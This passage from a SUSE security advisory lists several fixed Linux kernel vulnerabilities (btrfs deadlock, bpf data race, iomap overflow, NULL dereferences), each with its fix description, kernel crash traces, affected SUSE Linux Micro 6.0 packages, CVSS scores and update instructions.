"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: release path before inode lookup during the ino lookup ioctl\n\nDuring the ino lookup ioctl we can end up calling btrfs_iget() to get an\ninode reference while we are holding on a root\u0027s btree. If btrfs_iget()\nneeds to lookup the inode from the root\u0027s btree, because it\u0027s not\ncurrently loaded in memory, then it will need to lock another or the\nsame path in the same root btree. This may result in a deadlock and\ntrigger the following lockdep splat:\n\n WARNING: possible circular locking dependency detected\n 6.5.0-rc7-syzkaller-00004-gf7757129e3de #0 Not tainted\n ------------------------------------------------------\n syz-executor277/5012 is trying to acquire lock:\n ffff88802df41710 (btrfs-tree-01){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n\n but task is already holding lock:\n ffff88802df418e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #1 (btrfs-tree-00){++++}-{3:3}:\n down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645\n __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n btrfs_search_slot+0x13a4/0x2f80 fs/btrfs/ctree.c:2302\n btrfs_init_root_free_objectid+0x148/0x320 fs/btrfs/disk-io.c:4955\n btrfs_init_fs_root fs/btrfs/disk-io.c:1128 [inline]\n btrfs_get_root_ref+0x5ae/0xae0 fs/btrfs/disk-io.c:1338\n btrfs_get_fs_root fs/btrfs/disk-io.c:1390 [inline]\n open_ctree+0x29c8/0x3030 fs/btrfs/disk-io.c:3494\n btrfs_fill_super+0x1c7/0x2f0 fs/btrfs/super.c:1154\n btrfs_mount_root+0x7e0/0x910 fs/btrfs/super.c:1519\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n fc_mount fs/namespace.c:1112 [inline]\n vfs_kern_mount+0xbc/0x150 fs/namespace.c:1142\n btrfs_mount+0x39f/0xb50 fs/btrfs/super.c:1579\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n do_new_mount+0x28f/0xae0 fs/namespace.c:3335\n do_mount fs/namespace.c:3675 [inline]\n __do_sys_mount fs/namespace.c:3884 [inline]\n __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n -\u003e #0 (btrfs-tree-01){++++}-{3:3}:\n check_prev_add kernel/locking/lockdep.c:3142 [inline]\n check_prevs_add kernel/locking/lockdep.c:3261 [inline]\n validate_chain kernel/locking/lockdep.c:3876 [inline]\n __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144\n lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761\n down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645\n __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n btrfs_tree_read_lock fs/btrfs/locking.c:142 [inline]\n btrfs_read_lock_root_node+0x292/0x3c0 fs/btrfs/locking.c:281\n btrfs_search_slot_get_root fs/btrfs/ctree.c:1832 [inline]\n btrfs_search_slot+0x4ff/0x2f80 fs/btrfs/ctree.c:2154\n btrfs_lookup_inode+0xdc/0x480 fs/btrfs/inode-item.c:412\n btrfs_read_locked_inode fs/btrfs/inode.c:3892 [inline]\n btrfs_iget_path+0x2d9/0x1520 fs/btrfs/inode.c:5716\n btrfs_search_path_in_tree_user fs/btrfs/ioctl.c:1961 [inline]\n btrfs_ioctl_ino_lookup_user+0x77a/0xf50 fs/btrfs/ioctl.c:2105\n btrfs_ioctl+0xb0b/0xd40 fs/btrfs/ioctl.c:4683\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl+0xf8/0x170 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n other info \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54281",
"url": "https://www.suse.com/security/cve/CVE-2023-54281"
},
{
"category": "external",
"summary": "SUSE Bug 1255820 for CVE-2023-54281",
"url": "https://bugzilla.suse.com/1255820"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54281"
},
{
"cve": "CVE-2023-54282",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54282"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: tuners: qt1010: replace BUG_ON with a regular error\n\nBUG_ON is unnecessary here, and in addition it confuses smatch.\nReplacing this with an error return help resolve this smatch\nwarning:\n\ndrivers/media/tuners/qt1010.c:350 qt1010_init() error: buffer overflow \u0027i2c_data\u0027 34 \u003c= 34",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54282",
"url": "https://www.suse.com/security/cve/CVE-2023-54282"
},
{
"category": "external",
"summary": "SUSE Bug 1255810 for CVE-2023-54282",
"url": "https://bugzilla.suse.com/1255810"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54282"
},
{
"cve": "CVE-2023-54283",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54283"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Address KCSAN report on bpf_lru_list\n\nKCSAN reported a data-race when accessing node-\u003eref.\nAlthough node-\u003eref does not have to be accurate,\ntake this chance to use a more common READ_ONCE() and WRITE_ONCE()\npattern instead of data_race().\n\nThere is an existing bpf_lru_node_is_ref() and bpf_lru_node_set_ref().\nThis patch also adds bpf_lru_node_clear_ref() to do the\nWRITE_ONCE(node-\u003eref, 0) also.\n\n==================================================================\nBUG: KCSAN: data-race in __bpf_lru_list_rotate / __htab_lru_percpu_map_update_elem\n\nwrite to 0xffff888137038deb of 1 bytes by task 11240 on cpu 1:\n__bpf_lru_node_move kernel/bpf/bpf_lru_list.c:113 [inline]\n__bpf_lru_list_rotate_active kernel/bpf/bpf_lru_list.c:149 [inline]\n__bpf_lru_list_rotate+0x1bf/0x750 kernel/bpf/bpf_lru_list.c:240\nbpf_lru_list_pop_free_to_local kernel/bpf/bpf_lru_list.c:329 [inline]\nbpf_common_lru_pop_free kernel/bpf/bpf_lru_list.c:447 [inline]\nbpf_lru_pop_free+0x638/0xe20 kernel/bpf/bpf_lru_list.c:499\nprealloc_lru_pop kernel/bpf/hashtab.c:290 [inline]\n__htab_lru_percpu_map_update_elem+0xe7/0x820 kernel/bpf/hashtab.c:1316\nbpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313\nbpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200\ngeneric_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687\nbpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534\n__sys_bpf+0x338/0x810\n__do_sys_bpf kernel/bpf/syscall.c:5096 [inline]\n__se_sys_bpf kernel/bpf/syscall.c:5094 [inline]\n__x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nread to 0xffff888137038deb of 1 bytes by task 11241 on cpu 0:\nbpf_lru_node_set_ref kernel/bpf/bpf_lru_list.h:70 [inline]\n__htab_lru_percpu_map_update_elem+0x2f1/0x820 kernel/bpf/hashtab.c:1332\nbpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313\nbpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200\ngeneric_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687\nbpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534\n__sys_bpf+0x338/0x810\n__do_sys_bpf kernel/bpf/syscall.c:5096 [inline]\n__se_sys_bpf kernel/bpf/syscall.c:5094 [inline]\n__x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nvalue changed: 0x01 -\u003e 0x00\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 11241 Comm: syz-executor.3 Not tainted 6.3.0-rc7-syzkaller-00136-g6a66fdd29ea1 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/30/2023\n==================================================================",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54283",
"url": "https://www.suse.com/security/cve/CVE-2023-54283"
},
{
"category": "external",
"summary": "SUSE Bug 1255809 for CVE-2023-54283",
"url": "https://bugzilla.suse.com/1255809"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54283"
},
{
"cve": "CVE-2023-54285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niomap: Fix possible overflow condition in iomap_write_delalloc_scan\n\nfolio_next_index() returns an unsigned long value which left shifted\nby PAGE_SHIFT could possibly cause an overflow on 32-bit system. Instead\nuse folio_pos(folio) + folio_size(folio), which does this correctly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54285",
"url": "https://www.suse.com/security/cve/CVE-2023-54285"
},
{
"category": "external",
"summary": "SUSE Bug 1255807 for CVE-2023-54285",
"url": "https://bugzilla.suse.com/1255807"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54285"
},
{
"cve": "CVE-2023-54289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qedf: Fix NULL dereference in error handling\n\nSmatch reported:\n\ndrivers/scsi/qedf/qedf_main.c:3056 qedf_alloc_global_queues()\nwarn: missing unwind goto?\n\nAt this point in the function, nothing has been allocated so we can return\ndirectly. In particular the \"qedf-\u003eglobal_queues\" have not been allocated\nso calling qedf_free_global_queues() will lead to a NULL dereference when\nwe check if (!gl[i]) and \"gl\" is NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54289",
"url": "https://www.suse.com/security/cve/CVE-2023-54289"
},
{
"category": "external",
"summary": "SUSE Bug 1255806 for CVE-2023-54289",
"url": "https://bugzilla.suse.com/1255806"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54289"
},
{
"cve": "CVE-2023-54291",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54291"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvduse: fix NULL pointer dereference\n\nvduse_vdpa_set_vq_affinity callback can be called\nwith NULL value as cpu_mask when deleting the vduse\ndevice.\n\nThis patch resets virtqueue\u0027s IRQ affinity mask value\nto set all CPUs instead of dereferencing NULL cpu_mask.\n\n[ 4760.952149] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 4760.959110] #PF: supervisor read access in kernel mode\n[ 4760.964247] #PF: error_code(0x0000) - not-present page\n[ 4760.969385] PGD 0 P4D 0\n[ 4760.971927] Oops: 0000 [#1] PREEMPT SMP PTI\n[ 4760.976112] CPU: 13 PID: 2346 Comm: vdpa Not tainted 6.4.0-rc6+ #4\n[ 4760.982291] Hardware name: Dell Inc. PowerEdge R640/0W23H8, BIOS 2.8.1 06/26/2020\n[ 4760.989769] RIP: 0010:memcpy_orig+0xc5/0x130\n[ 4760.994049] Code: 16 f8 4c 89 07 4c 89 4f 08 4c 89 54 17 f0 4c 89 5c 17 f8 c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 83 fa 08 72 1b \u003c4c\u003e 8b 06 4c 8b 4c 16 f8 4c 89 07 4c 89 4c 17 f8 c3 cc cc cc cc 66\n[ 4761.012793] RSP: 0018:ffffb1d565abb830 EFLAGS: 00010246\n[ 4761.018020] RAX: ffff9f4bf6b27898 RBX: ffff9f4be23969c0 RCX: ffff9f4bcadf6400\n[ 4761.025152] RDX: 0000000000000008 RSI: 0000000000000000 RDI: ffff9f4bf6b27898\n[ 4761.032286] RBP: 0000000000000000 R08: 0000000000000008 R09: 0000000000000000\n[ 4761.039416] R10: 0000000000000000 R11: 0000000000000600 R12: 0000000000000000\n[ 4761.046549] R13: 0000000000000000 R14: 0000000000000080 R15: ffffb1d565abbb10\n[ 4761.053680] FS: 00007f64c2ec2740(0000) GS:ffff9f635f980000(0000) knlGS:0000000000000000\n[ 4761.061765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 4761.067513] CR2: 0000000000000000 CR3: 0000001875270006 CR4: 00000000007706e0\n[ 4761.074645] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 4761.081775] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 4761.088909] PKRU: 55555554\n[ 4761.091620] Call Trace:\n[ 4761.094074] \u003cTASK\u003e\n[ 4761.096180] ? __die+0x1f/0x70\n[ 4761.099238] ? page_fault_oops+0x171/0x4f0\n[ 4761.103340] ? exc_page_fault+0x7b/0x180\n[ 4761.107265] ? asm_exc_page_fault+0x22/0x30\n[ 4761.111460] ? 